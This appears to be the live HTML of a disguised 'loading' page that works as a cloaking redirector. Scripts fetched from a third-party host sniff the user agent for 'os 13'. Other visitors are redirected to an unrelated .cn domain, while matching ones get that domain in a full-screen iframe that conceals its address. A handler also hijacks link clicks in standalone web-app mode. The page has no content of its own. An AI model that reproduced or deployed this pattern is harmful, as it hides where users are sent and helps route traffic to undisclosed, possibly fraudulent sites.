
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>···加载中···</title>
<meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"/>
<meta name="format-detection" content="telephone=no"/>
<meta name="apple-mobile-web-app-capable" content="yes"/>
<meta name="wap-font-scale" content="no"/>
<meta name="apple-mobile-web-app-status-bar-style" content="black"/>
<script type="text/javascript">var rid = "eOYyAv";var longurl = "https://sinmed.bxxfxlp.cn";</script>
<script type="text/javascript" src="https://danye.189hj.cn/buxian/js/jquery.min.js"></script>
<script type="text/javascript" src="https://danye.189hj.cn/buxian/js/jquery.zclip.min.js"></script>
<script language="javascript">
var UserAgent = navigator.userAgent.toLowerCase();
  var os_13 = UserAgent.indexOf("os 13");
  if (os_13 < 0){
    window.location.replace(longurl)
  }else{
    
  }
</script>
<style type="text/css">
  body,div,form,input,li,ol,p,textarea,ul{margin:0;padding:0;font-family: "Microsoft YaHei";color: #fff;}
  body{background:#fff;color:#3f3f3f;font-family:Apple LiGothic Medium,SimHei,Geneva,Arial,Helvetica,sans-serif;-webkit-tap-highlight-color:transparent;-webkit-tap-highlight-color:transparent;-webkit-touch-callout:none;-webkit-appearance:none;width:100%;font-size:12px;}
  body p {color: white;text-align: center;line-height: 25px;}
  img{border:0 none}
  hr{margin: 10px}
  .fh_jt{width:15rem;height:4.28rem}
  .fh_jt img{width:15rem;height:4.28rem}
  .fh_wz{height:6.9rem;line-height:1rem;font-size:.7rem;text-align:center;color:#333}
  .fh_tp{width:12.44rem;height:10rem;margin:0 auto}
  .fh_tp img{width:12.44rem;height:10rem;text-align:center}
  #sff{margin-top: 40px;}
</style>
</head>
<body style="background: url() no-repeat fixed top;text-align: center;">
<div id="Zl"> 
</div>
<script>
  $('#Zl').html('<iframe width="100%" id="eOYyAv" src="'+longurl+'" frameborder="0"></iframe>');
  $(document).ready(function(){
    $(window).resize(function(){fix_height();}).resize();
  });
  function fix_height(){$("#eOYyAv").attr("height", (($(window).height())-5) + "px");}
</script>
<script>
	if(('standalone' in window.navigator)&&window.navigator.standalone){
		var noddy,remotes=false;
			document.addEventListener('click',function(event){
			noddy=event.target;
			while(noddy.nodeName!=='A'&&noddy.nodeName!=='HTML') noddy=noddy.parentNode;
				if('href' in noddy&&noddy.href.indexOf('http')!==-1&&(noddy.href.indexOf(document.location.host)!==-1||remotes)){
					event.preventDefault();
					document.location.href=noddy.href;
				}
		},false);
	}
</script>
</body>
</html>
